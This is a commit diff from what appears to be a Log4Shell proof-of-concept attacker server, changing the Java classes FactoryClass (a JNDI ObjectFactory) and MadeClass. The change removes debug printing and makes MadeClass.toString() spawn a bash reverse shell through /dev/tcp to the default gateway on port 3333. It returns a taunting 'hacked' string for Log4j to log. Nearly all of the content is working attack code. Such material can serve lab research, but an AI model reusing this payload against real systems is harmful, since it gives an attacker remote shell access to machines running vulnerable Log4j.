reverse shell to default route

attacker/http/src/FactoryClass.java

@@ -23,20 +23,6 @@ public class FactoryClass implements ObjectFactory {
         Context nameCtx,
         Hashtable<?,?> env
     ) {
-
-        // Add instrumentation
-        System.out.println("RCE Acheived in FactoryClass::getObjectInstance!");
-        System.out.println("name:    " + name   );
-        System.out.println("nameCtx: " + nameCtx);
-        System.out.println("env:     " + env    );
-        System.out.println("obj:     " + obj    );
-
-        // Do whatever we want
-        RCEMain.rceMain();
-
-        // We could choose not to return. However, the caller is expecting an
-        // object of type MadeClass. I choose to give them something. It's
-        // useful for further instrumentation.
         return new MadeClass();
     }
 }

attacker/http/src/MadeClass.java

@@ -8,22 +8,16 @@ public class MadeClass {
     @Override
     public String toString() {
 
-        // Add instrumentation
-        System.out.println("RCE Acheived in MadeClass::toString!");
-
+        // Reverse shell
         ProcessBuilder processBuilder = new ProcessBuilder();
-	    processBuilder.command("bash", "-c", "bash -i >& /dev/tcp/172.17.0.1/3333 0>&1");
+	    processBuilder.command("bash", "-c", "bash -i >& /dev/tcp/`ip route | grep default | cut -d ' ' -f 3`/3333 0>&1");
         try {
             processBuilder.start();
         } catch (Exception e) {
             e.printStackTrace();
         }
 
-        System.out.println("REVERSE SHELL :)");
-        RCEMain.rceMain();
-
-        // We could choose not to return. However, the caller is expecting an
-        // object of String. I choose to give them something.
-        return "MadeClass";
+        // Return a string for Log4j to have something to log
+        return "Y0U H4V3 B33N H4CK3D !";
     }
 }